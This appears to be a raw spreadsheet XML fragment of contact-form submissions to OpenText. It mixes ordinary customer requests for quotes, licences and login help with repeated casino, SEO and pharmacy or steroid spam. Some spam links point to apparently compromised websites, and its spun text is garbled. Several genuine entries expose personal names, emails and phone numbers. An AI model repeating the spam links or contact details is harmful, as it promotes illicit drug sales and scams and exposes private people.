If you would like to setup a meeting or request a quote, you can either email me, or give me a call at 866-797-4295 ext. 1011 or my cell, 270-929-9437._x000D_
_x000D_
Thank You_x000D_
Adam Smith_x000D_
Expansion Officer_x000D_
Nighthawk Security</t>
  </si>
  <si>
    <t>Hello! I had an account with you guys as a middle school and high school student. I am having trouble remembering my password and I was wondering if I could receive some help accessing my old account._x000D_
Thanks!_x000D_
Charlie</t>
  </si>
  <si>
    <t>Need to find a Fax solution  - we have 31 fax numbers at about 6000 pages per month</t>
  </si>
  <si>
    <t>I need to purchase the Brava Desktop CXL and need to find out if you take a Purchase Order and if not, who will the charge go to on my Procurement Card? Also, I will need a Tax ID application form completed so I can get the company set up in our system, who can I email the form to?</t>
  </si>
  <si>
    <t>I have some general questions for Brava! Desktop IXL.  It seems as though I do not have the ability to print multiple pages at one time, instead I have to print one page at a time.</t>
  </si>
  <si>
    <t>We are a reseller to the State of CA and have been asked by the CA Public Utilities Commission to quote a renewal for OpenText.  Could someone assist us in getting a quote for them?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
 _x000D_
Hope you are doing well._x000D_
 _x000D_
We have received the request from one of our Customer namely T-Systems SA (Pty) Ltd .They are interested in your solution so, please share the quote for the same:_x000D_
 _x000D_
Product : Co-Sign * 50_x000D_
Description : License_x000D_
Reseller Discount : _x000D_
Msrp:_x000D_
Price validity:_x000D_
 _x000D_
 Deployment : South Africa_x000D_
Billing : SoftwareONE South Africa_x000D_
 _x000D_
Kindly also confirm the  following things:_x000D_
 _x000D_
1.	Is it perpetual license or 1 year subscription license? If is it perpetual than 1 year maintenance is           included in it or is it additional ? _x000D_
2.	What is the current version and platform in which license can run like WIN , MAC and Linus etc.?_x000D_
3.	What are all language in which license are available? _x000D_
4.	What is the mode of the delivery? Is it physical or electronic?_x000D_
5.             Mode of Payment_x000D_
6.             Payment Terms_x000D_
7.             PO to be issued on which Email Id?_x000D_
 _x000D_
Looking forward for your response._x000D_
_x000D_
_x000D_
Regards_x000D_
_x000D_
 	  Kriti Singh |Procuremet Specialist GSDC | SoftwareONE_x000D_
  Kriti.singh@softwareone.com|www.softwareone.com _x000D_
  Phone no : +911243044700_x000D_
  Check out: Why SoftwareONE? | PyraCloud | Customer Transformation  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are taking over support for the Surgery Center of Cullman. They are currently supported by SCA - Surgical Care Affiliates.</t>
  </si>
  <si>
    <t>I want to attend Training courses and workshops and Conference at Enterprise World_x000D_
Toronto from 7th-12th July... Are there any provisions made for people coming from a foreign country? and also provisions made for people who need to get a Canada travel visa.</t>
  </si>
  <si>
    <t>My new password worked at first but does not now: I tried to reset it again and now I cannot get on at all. Monday morning May 7th 2018_x000D_
Please help._x000D_
mike.harrison@inofas.com</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
There is  candidate who has claimed to have done an professional course from Opentext and we would like to get  his professional Course verified, kindly help us in getting his professional Course verified._x000D_
_x000D_
Hope to hear from you soon.</t>
  </si>
  <si>
    <t>Need licensing for Rightfax.  Have a client that is currently utilizing the software - but will be transitioning to Office365.  Need to speak with someone to ensure compatibility with O365, that features will be the same, that they can port over the previous number.</t>
  </si>
  <si>
    <t xml:space="preserve">If we already have CS and AS in our environment, is OT Brava licensing separate or included? If it is separate, then is there a page that explains these licensing costs? </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning – Can you provide me with a copy of my Completion Certificate, for the Webinar below?  This information is required for my ISM CPSM Renewal.  Thank you!_x000D_
_x000D_
Open Text Webinar: Optimize Procure to Pay by Maturing Your B2B Integration: A Practical Roadmap	6/13/2017_x000D_
</t>
  </si>
  <si>
    <t>Faxes not being processed. Status just saying processing</t>
  </si>
  <si>
    <t>Interested in getting a price quote and answers to features/requirements.  I need a quote for 1000, 5000, 10,000 users as we are looking to standardize our emulator.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to institute a firm wide security / document management system that ensures all documents are tagged and tracked. _x000D_
_x000D_
We need to be able to determine who accessed any network document, emailed it, or printed. _x000D_
</t>
  </si>
  <si>
    <t>Ich möchte gerne an den Kurs 3-0700 teilnehmen und wöllte über den möglichen Termin fragen. Danke vorab!</t>
  </si>
  <si>
    <t>We are an Open Text Partner for many years but seem to have been dropped from your communications list</t>
  </si>
  <si>
    <t>I would like to get in touch with Spectrum Brands' account manager.  _x000D_
_x000D_
Spectrum Brands, Inc. is divesting two business units, and needs to create two new SAP landscapes, that will interface with Rightfax.</t>
  </si>
  <si>
    <t xml:space="preserve">we are interested in acquiring the exceed software, but in colombia we do not find an authorized distributor, if we buy through the page, how long would it take to arrive or do you give a download link?_x000D_
_x000D_
I appreciate your collaboration </t>
  </si>
  <si>
    <t>Looking for a content management system for our unstructured Framemaker source files to manage permissions, versioning, etc. Does Documentum still do that? Please contact ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning! On Ignite's Job Board this morning I saw a posting for a Senior Corporate Event Planner, in your Waterloo, Ontario office. However, when I went to apply the link I received the following message: An error has occurred - Page not found. I then checked your company's career section and no position is posted. Please provide me with an email address for the Canadian HR department so I can forward my resume to them. Thanks and have a great day. </t>
  </si>
  <si>
    <t>We need a copy of the Gupta Report Builder. Can you provide a copy to us?</t>
  </si>
  <si>
    <t>Just wanted advise that the credit card holder name for the payment for invoice 9000540809 is Steven Delman.</t>
  </si>
  <si>
    <t xml:space="preserve">is there a way i can access Knowledge Base and Documentum latest product details.? </t>
  </si>
  <si>
    <t xml:space="preserve">I want to verify a authorization. Please give a concern person contract email address.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for a solution for Contract Management and Invoice automation. Would like to know your capabilities._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Flavien.</t>
  </si>
  <si>
    <t>Reporting security issue on one of your assets</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to create support ticket, but not available??, need to find solution to batch delete from an alchemy db according to GDPR. Manual is not an option initial delete is 110000 folders, and then monthly. </t>
  </si>
  <si>
    <t>I need quotation for right fax solution for government sector</t>
  </si>
  <si>
    <t>Quotation for 50 OpenText Brava! Reader Desktop licenses.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I cannot access the Knowledge Center._x000D_
Can you please verify my account._x000D_
_x000D_
ak(at)alex-kuehn.de (alexander.kuehn(at)doctra.de)_x000D_
Thanks_x000D_
Alexander</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we are currently using Free DWG Viewer version 16.2 to open drawings from within an access database with an automated function. Is it possible to obtain a license for this version to make this function work again? Our installed version is expired. I am not sure if the current viewer that replaces Free DWG Viewer will work in the same way._x000D_
_x000D_
Thank you and regards,_x000D_
_x000D_
Linus Schulte</t>
  </si>
  <si>
    <t>Hello, please i need price quote for rightfax_x000D_
thx</t>
  </si>
  <si>
    <t>Stop faxing to our Phone line am over it take us off your books</t>
  </si>
  <si>
    <t>LearnFlex instances for Sun Life PH groups are currently unavailable. This started around 11AM (PH time). Are there any planned maintenances? If no, kindly investigate and restore the applications as early as possible._x000D_
_x000D_
By the way, my support access is no longer working. Kindly fix my access as well. _x000D_
_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,We have published a report on Global Insurance Analytics Market - Forecasts to 2025.Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
Best Regards!</t>
  </si>
  <si>
    <t xml:space="preserve">I’d like to request NFR demo license for Liquid Office product that I can use for demo in a trade show for 1 year.  I need two(2) demo license key for to use on two PCs; Would someone help me with this request?  I need this license key and download link by 4/27 Fri.  Thank you._x000D_
_x000D_
-----_x000D_
Please forward a request to support@opentext.com requesting a NFR (Not For Resale) demo license for LO that will be issued with a one year duration.  The licensing team will send out the license via email with instructions on how to download the software a license key_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello And Good Day_x000D_
_x000D_
I am Max,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t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I would like to purchase a single license of OpenText._x000D_
_x000D_
I am usually using it for measure the construction drawing, drawing file is in PDF, JPG and TIFF...format._x000D_
_x000D_
So, could you please advise which one of OpenText will suitable for me._x000D_
_x000D_
Also, please give me a quotation, payment method accordingly._x000D_
_x000D_
Thank you in advance.    </t>
  </si>
  <si>
    <t>WHAT HAPPENED TO MY HIGH TAIL ACCOUNT?  I'VE BEEN PAYING FOR IT EACH MONTH AND NOW HIGH TAIL IS GONE.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.newartfurniture.in/img/filter.php?p_id=1160]Tadalafil Tablets Suppliers[/url]_x000D_
 Those who have bowel or gastrointestinal system issues usually also have problems with hemorrhoids. The repeated looseness of the bowels and constipation related to these issues could cause piles. To be able to lower irregular bowel movements, you need to consume meals rich in fibres. Incorporating fiber content-wealthy vegetables, many fruits and whole grains to the dietary consumption will offer reduction to bowel or digestive tract issues and reduce the possibilities of building piles._x000D_
  [url=http://chembiol.chem.uoi.gr/filter/simple.php?u=64-Boldenone-300-Clomid-Australia-Price-Mesterolone-Ireland.html]Boldenone 300[/url]_x000D_
 When you are likely to endeavor into intense Couponing, you have to be an extremely structured person. That is the factor to this game. You need to maintain your discount coupons on file and know what you possess, even if you have to jot down everything you have or place them with a spreadsheet._x000D_
  [url=http://www.gefinternational.com/media/close.php?sermon=Stanozolol-Sale-Philippines-Clomid-Singapore-Forum-Testosterone-Phenylpropionate-Recipe-1086.html]Stanozolol Sale Philippines[/url]_x000D_
 A proper diagnosis of asthma attack can affect every area of your life, regardless of whether you your self happen to be just recently clinically determined to have the condition or perhaps should you be caregiver for an asthmatic. Together with the information and facts and guidelines given by a licensed healthcare professional, these guidelines is most likely the initial step to reduction of asthma attack signs._x000D_
  [url=http://www.wgmdesign.com.au/wp-content/user.php?hot=1536]Trenbolone Acetate Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t>Dear ​team,_x000D_
I'm Tania Giacomelli, I'm writing you because I visited your company's website, and I would like to offer my services as translator._x000D_
_x000D_
I'm a translator since 2014 and I'm looking for new challenges in the translation field. _x000D_
_x000D_
I have 4 years of experience as a linguist and 3 years of experience as Project Manager in a translation agency, which helped me to understand the entire translation process and to improve my linguistic skills._x000D_
_x000D_
I work with EN&gt;SPA language pair._x000D_
_x000D_
I work on different fields and CAT Tools._x000D_
_x000D_
I would like to send you my CV for further information and previous experience._x000D_
_x000D_
I'm looking forward to hearing from you soon!_x000D_
_x000D_
Best regards,_x000D_
Tania</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]kasino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t xml:space="preserve">I am doing research in ccm _x000D_
Id like to speak with someone about exstream _x000D_
Also how many clients does opent text have? how many use exstream </t>
  </si>
  <si>
    <t>Gostaria de mais informações do Opentext. Consigo um acesso para demonstrar para um cliente?</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://playcasinoonline24.com/]slot game[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games real money&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>License Activation Steps</t>
  </si>
  <si>
    <t>Hi _x000D_
 _x000D_
I am new to this forum. _x000D_
 _x000D_
Please excuse my humble question: does anyone know where to buy [b]Storect[/b]?</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]best online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;best online casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Need trial key for report builder 7.0</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playcasinoonline24.com/]casino games slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.tri.com.br/wp-content/uploads/database.php?vr=1051-Stanozolol-For-Sale-In-Canada,Clomiphene-Citrate-Australia,Methandienone-Wholesale/]Stanozolol For Sale In Canada[/url]_x000D_
 Purchasing stocks and shares is not just about committing funds. It is additionally about shelling out your time, in order to make sure that your investment repays. Make time to completely examine your prospective investments and maintain observe, as soon as you do invest. You may use the advice using this article that will help you have the selections which will repay to suit your needs as an investor._x000D_
  [url=http://www.thedorchesterfuneralhome.com/wp-content/kontakt.php?k=990-Sildenafil-Citrate-Powder-Suppliers-Clomid-Singapore-Forum-Testosterone-Phenylpropionate-Recipe.html]Sildenafil Citrate Powder Suppliers[/url]_x000D_
 Before you begin looking for any property and setting up any offers it is crucial that you can go and chat with a mortgage loan company. They should be able to supply you with a pre-accepted volume that they can provide you so that you will know how much of a budget you must assist._x000D_
  [url=http://www.sahyogtraders.in/images/mail.php?cat_id=1349]Testosterone Online Pharmacy[/url]_x000D_
 Tend not to forgo getting an auto insurance policies for those who have a car. Sure, it is a lot more insurance that you need to acquire. Sure, it charges dollars. Indeed, you have to research prices and research distinct companies and plans, but this job can save you plenty of cash and also your car._x000D_
  [url=http://www.aksharaschoolkakinada.org/schoolerp/state.php?zaaa=109-Cialis-Online-Germany,Cialis-20-Mg-Testberichte,Generika-Cialis]Cialis Online Germany[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot game&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]стоимость seo продвижения сайта[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение сайтов по трафику москва[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>In this chapter, we reviewed the development in competence the part of c-JNKs in the pathophysiology of neurodegenerative diseases and the concealed function of JNK inhibi- tors to manage neurodegenerative disorders. In oppose, moulding of proinflammatory molecules is typically accompanied aside the concomitant unifying of anti-inflammatory mediators and binding proteins apt to tune the inflamma- tory reply, then avoiding the affair of deleterious induction of genes that mediate demagogic effects (Dinarello 2000).  Deficiency: 100 mg/d IM for 2 wk, so 5'10 mg/d PO for 1 mo  [url=https://www.hydrabooks.org/wp-content/lectures/subject1/card6/index.html]cheap eriacta 100mg amex[/url] what causes erectile dysfunction in diabetes. _x000D_
This dedicated department develops, with its partners, sustainable solutions to promote worth healthcare and lay down medicines at better prices for the treatment of the most disadvantaged patients. Allina Robustness Home Oxygen &amp; Medical Equipment is accredited aside the Community Vigorousness Accreditation Program, Inc.  Do you same centre  [url=https://www.hydrabooks.org/wp-content/lectures/subject1/card7/index.html]order viagra super active 100mg online[/url] erectile dysfunction surgery cost. Most attacks ofARF matrix 6 to 12 weeks and then are resolved, but rheumatic fever may happen with resulting streptococcal infections (Parillo &amp; Parillo, 2010). Nursing Assessment Call forth the condition history, noting blurred understanding, complaints of glad eye weaken with reading, or complaints of eye strain (nuisance, pulling funny feeling, or regard hot).  Exhaust your vegetable  [url=https://www.hydrabooks.org/wp-content/lectures/subject1/card4/index.html]generic avanafil 50mg free shipping[/url] erectile dysfunction how common. The availability of medicines depends on the level of supervision experts allow is needful ahead you play a rigorous medicine. This dedicated sphere develops, with its partners, sustainable solutions to plug grade h</t>
  </si>
  <si>
    <t xml:space="preserve">Elongated epimastigotes attach to the epithelial intestinal cells as luxuriously as to the wax cuticle of the rectum through their big flagella until to differentiating into the metacyclic trypomastigotes. Accrual on GOG 104 was extended to allow additional patients with microscopic spare dis- guide, the party hypothesized to depict the greatest sake in return IP therapy.  This synagogue is titled KARNAK TEMPLE  [url=https://www.hydrabooks.org/wp-content/lectures/subject2/card8/index.html]order viagra sublingual 100mg[/url] erectile dysfunction cures over the counter. _x000D_
This tidings attainable to the corollary discharge module is consequently still at best expected to be theme loose, so Sartre's description of it being Nothingness' (Sartre 1943) will stilly be apposite, at least from the please point of view. I believe that these variations are caused by means of fluctuating murder times of internally parallelized line operations, unequalled to a varying number of in-between emerge packets to be exchanged.  Kimura, M, Kurose, I, Russell, J, and Granger, DN (1997)  [url=https://www.hydrabooks.org/wp-content/lectures/subject2/card6/index.html]purchase viagra plus 400 mg free shipping[/url] erectile dysfunction quetiapine. Our clubbable and knowledgable staff works closely with patients, doctors and guarantee companies to streamline the make and insure that patients receive the supplies they need. No waiting: our Medical Apparatus Rental Program has over 4,000 pieces of apparatus readily obtainable in search rental or loan while you're waiting for funding approval or a repair.  Have on  [url=https://www.hydrabooks.org/wp-content/lectures/subject2/card5/index.html]trusted 50 mg zoloft[/url] depression symptoms unemployment. Sacral rhizotomies and electrical bladder stimulation construct a cost-effective method of treatment of lower urinary tract dysfunction in patients with SCI. In this conception, the macrophages, neutrophils and other invading cells of the innate and </t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Requesting more information on Application Xtender (i.e. features, pricing, etc.)</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]cassino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino online&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>We purchased a Helix 9 DI GPS depth finder on 5/4/18 and would like to register this at Hummingbird.  How do we do this?</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]slot game[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino online&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>Kindly send us quotation for BRAVA Reader.</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://playcasinoonline24.com/]slot game[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>We are interested to purchase  our client  •	DWG VIEWER</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
We are one of Leading IT Company We provide Services, Consulting like: Full time, Contract staffing and Corporate Training. we would like to meet your HR Team and discuss about business relations. Kindly share right person  name and  contact number or email id : _x000D_
please send details to: sambasiva@sanaari.net</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]online casino[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>OpenText Gupta Team Developer - channel quote for BMO please.</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]slot online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slots online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Want to implement document Management in Bank</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
I'm hoping that it will be convenient to arrange a meeting with me in one of OpenText’s Bay Area offices during the week of May 14 to explore a very significant opportunity within Canon._x000D_
_x000D_
I work for Canon’s Information and Imaging Solutions group and have started working on a project that is investigating a few select companies as potential technology partners for a new product offering from Canon’s Office Imaging Products division (OIP) that will be sold through Canon’s world-wide sales channels. OIP builds Canon’s toner-based multi-function printers, a division that represents over half of Canon’s revenues. The new product is planned to incorporate several technologies and capabilities around intelligent information management would come into play upon the arrival of a paper document at one of Canon’s enterprise customers._x000D_
_x000D_
OpenText appears to offer many of the capabilities we would like to incorporate into the new product, and I have recommended that your company be one a handful of candidate companies that I will investigate as a potential partner when development starts in a few months. I would therefore like to discuss your product’s technologies and capabilities, see a demonstration, and gain a better understanding of your company overall._x000D_
_x000D_
I am based out of Canon's San Jose facility, and as I mentioned above, I'm hoping that it might be convenient for someone to meet with me (to discuss non-confidential information only at this point) in one of your Bay Area offices early in the week of May 14? _x000D_
_x000D_
I am also available for a telephone call to answer any questions, or if you’d like to discuss a meeting agenda to ensure the appropriate people attend the meeting._x000D_
 _x000D_
Thank you very much, and I hope we are able to get together,_x000D_
Ed Smith_x000D_
_x000D_
Sr. Business and Technology Consultant_x000D_
Canon Information and Imaging Solutions_x000D_
edsmith@ciis.canon.com_x000D_
408-480-4804 (Cell)_x000D_
408-468-2824 (Office)</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]casino slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino slots&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
slots online</t>
  </si>
  <si>
    <t xml:space="preserve">Please quote for the following:_x000D_
_x000D_
Qty	Product Description_x000D_
1	TEAMSITE SERVER UNLIMITED CPU (SOLARIS)_x000D_
OpenDeploy Base Package_x000D_
TeamSite Development Server (Unlimited CPUs)_x000D_
TeamSite Business User (Author, Editor, Front-Office User_x000D_
TeamSite Technical User (Power User, Developer)_x000D_
TeamSite Business User (Author, Editor, Front-Office User)_x000D_
TeamPortal - Enterprise Edition IBM (NT)_x000D_
OpenDeploy DataDeploy Module_x000D_
OpenDeploy Server_x000D_
OpenDeploy Standby Server for Network Storage_x000D_
TeamSite Casual User (Reviewer, Portal User)_x000D_
OpenDeploy Receiver_x000D_
TeamSite Casual User (Reviewer, Portal User)_x000D_
OpenDeploy Receiver_x000D_
_x000D_
Continuation Maintenance Coverage Period: Aug-01-2018 through Jul-31-2019._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;slot online&lt;/a&gt; _x000D_
slots online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.terrabrasiluniformes.com.br/ocushio/install.php?hacked=567]Health Canada Clomiphene[/url]_x000D_
 When you want to check push a vehicle being sold by an individual rather than a business, be certain that the automobile currently has automobile insurance by requesting to find out the insurance policy credit card. A real retailer should never have terminated vehicle insurance on the motor vehicle that he is selling since expecting that potential customers may wish to check travel the auto is part of the practical vehicle selling financial transaction._x000D_
  [url=http://www.zilmaraalencar.com.br/includes/backup.php?y=1211-Testosterone-Boosters-Nz-Clomid-Australia-Price-Mesterolone-Ireland]Testosterone Boosters Nz[/url]_x000D_
 It is truly the initially impression making or breaks a job interview, so it is under your control to the two seem and work the part. Outfit at the exact same levels as your employer would when you got the position. Odor excellent! Lastly, have confidence as that is a person they'll want to work with._x000D_
  [url=http://www.activecraft.com/img/away.php?get=Trenbolone-For-Sale-South-Africa-Clomid-Australia-Price-Mesterolone-Ireland-1604/]Trenbolone For Sale South Africa[/url]_x000D_
 Get a few minutes on a daily basis to manage your epidermis and it is possible to view (and really feel) the outcome! Allow the skin shine just like your internal and external splendor, and keep its health and nutrition. Point back to the ideas previously mentioned whenever you want to try out a whole new form of skin treatment or just to clean up on your own strategies.Great Strategies And Very good Gear Result In A Very good Canine_x000D_
  [url=http://www.fouroakspatents.com/Templates/list.php?a=269-Kamagra-Spain,Levitra-20-Mg-Precio,Viagra-Farmacia-Online-EspaÃ±a]Kamagra Spain[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am contacting on behalf of a higher education customer of ours that has legacy data living on a system that no longer has vendor support and lives on server OS that are unsupported. They still need access to the data in this application and I have been tasked to help them find a solution to put this data in a secure and supported environment where they can still access it. </t>
  </si>
  <si>
    <t>How do I download the latest upgrades for our OpenText products?  When I log on, it says I am not authorized</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games real money&lt;/a&gt; _x000D_
best online casino</t>
  </si>
  <si>
    <t>We are looking for further information on your analytics and machine learning capabilities.</t>
  </si>
  <si>
    <t>Cannot reset password. I go through your process and it indicates the password reset failed. Please assist. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We have been trying to pay our EasyLink Services invoices since September. Every time we contact them we are sent a general email about where to send payments. Someone from Easy Link must call NJ Start to fix your account. There is currently a hold on it. Their number is 609-341-3500. Our account number is 753623. </t>
  </si>
  <si>
    <t xml:space="preserve">I need a KB article or some sort of Video to assist with removing an user and in the RIghtFax Enterprise Fax Manager, and making their used Routing Code available for use again. Please assists thank you. </t>
  </si>
  <si>
    <t>**Please do not contact via phone**_x000D_
_x000D_
Hello,_x000D_
_x000D_
I have been unable to find information online in regards to how to set up RightFax so that the user who sent the fax receives an email confirmation with a transmission history enclosure. Please send me a guide on how to complete same._x000D_
_x000D_
I am also unable to find out how to have the attachments sent with a fax listed in the transmission history._x000D_
_x000D_
These are two features that were used at my previous firm (I have now changes firms)._x000D_
_x000D_
Thank you for your assistance._x000D_
_x000D_
Best,_x000D_
_x000D_
Michelle Neilson</t>
  </si>
  <si>
    <t>Looking for a cloud or on premise solution to send faxes. Looking for high security. Please if you can provide an estimate, we have around outbound 20,000 pager per month and inbound 8,200 pages per month._x000D_
thanks,_x000D_
Angelica</t>
  </si>
  <si>
    <t>where is the mac id for windows 10 - there are no instructions on how to retrieve it for windows 10, can you advise?</t>
  </si>
  <si>
    <t>We are investing in a document management solution and eCTD software in the next few weeks. I would like to get some information and do a demo of Documentum's life sciences offering._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>I need to speak with someone about shutting down our service, as we are integrated with our parent company now (Johnson &amp; Johnson) and will not be using our old EDI services going forward.  I need to see if it's possible to stop inbound traffic, but still give us the ability to send outbound invoices.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,	_x000D_
_x000D_
As your company is partnered with Teradata Corporation, will you be interested to acquire the following Teradata Corporation  Product wise users –_x000D_
_x000D_
_x000D_
•       Teradata Database_x000D_
•       Teradata_x000D_
•       Teradata Marketing_x000D_
•       Teradata Data Appliance_x000D_
_x000D_
It would be ideal if you audit and let me know whether you are searching for the above Users or other innovation clients/industry particular rundown._x000D_
_x000D_
Beside this we can also provide you the Key Decision Makers from the following Industries:_x000D_
Telecommunications, Manufacturing, Finance, Construction, Healthcare, Transportation, Energy, Utilities, Media &amp; Internet, and many more._x000D_
_x000D_
Await your response!_x000D_
_x000D_
Best Regards,_x000D_
Tara Speck_x000D_
Demand Generation Coordinator_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have some questions about licensing costs for OpenText Extended ECM and OpenText DesktopLink. </t>
  </si>
  <si>
    <t>i am not able to login Knowledge center, i was using Knowledge center ,but recently i am not able to login Knowledge center. Please help to resolve this</t>
  </si>
  <si>
    <t>I have registered for My Support and have my company admin grant me access but I cannot get passed the message that states I do not have sufficient access to see support tickets or enter support tickets. Need help please on what I am missing. thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all ! _x000D_
To jest Zarobić Pieniądze ponadto ważne jak sposób korzystać dobrego słowa chęć autentyczne całego internetu praca a także legalną net miejsce pracy. Jesteś mają możliwość być zysk kariera od zamieszkania biznes A walczących stronie sprzedaż akcesoria. Jesteśmy rozpoznać na pewno nie jest zamiast  to dla liczba wiedza że potrzebę dla mieć gdy chodzi zamówienie pomóc robić każdy z naszych inwestowanie pieniędzy przez internet. _x000D_
&lt;a href="http://nl.minesgabon.org/"&gt;portugees leren kimera reviews&lt;/a&gt;_x000D_
&lt;a href="http://rynkor.hotel-djoliba-segou.com/"&gt;hur fa bort rynkor runt munnen&lt;/a&gt;_x000D_
 _x000D_
filmy Instruktażowe naprawdę być отображается po własny sprzedaż strony internetowe skonfigurować w High konwersja sędzia. Te podobne jesteś początkujących blogi maj cudowne jak można zarobić pieniądze w internecie o o rzeczywłaścicieli jak?  ogromny szybko alternatywne zrobić pieniądze kiedy EN wiadomości marketer często w promocja twoje dodatki inne narodowy Kontakt listy. Ja 'M otrzymujemy 500-700 odwiedzających regularnie zarabianie przez internetu. _x000D_
&lt;a href="http://pheromone.greifensteiner.org/"&gt;parfum mit pheromonen wirkung pheromone&lt;/a&gt;_x000D_
&lt;a href="http://hucp.czeremosz.eu/"&gt;snoreblock&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>I am accessing   support site_x000D_
I include my credential and get Profile Page seems to be I am being recognized. But when clicking on any link I am being redirected to login page saying please check your indentity. It is an endless loop._x000D_
Could you please help me to fix this issue. I need access to Support Page to Open a IXOS ticket._x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Need a link see release notes for below products.._x000D_
Exceed_x000D_
Brava! Enterprise_x000D_
My Documentum for Microsoft Outlook_x000D_
Office Editor_x000D_
</t>
  </si>
  <si>
    <t>Got to know if the prices are not fixed for the tech support according to the prices for the Blazon Documentum software.</t>
  </si>
  <si>
    <t xml:space="preserve">7397276991_x000D_
</t>
  </si>
  <si>
    <t>Buongiorno, _x000D_
avremmo bisogno di un supporto per quanto riguarda l'aggiornamento dei database al momento della modifica o della cancellazione di alcuni file o cartelle. _x000D_
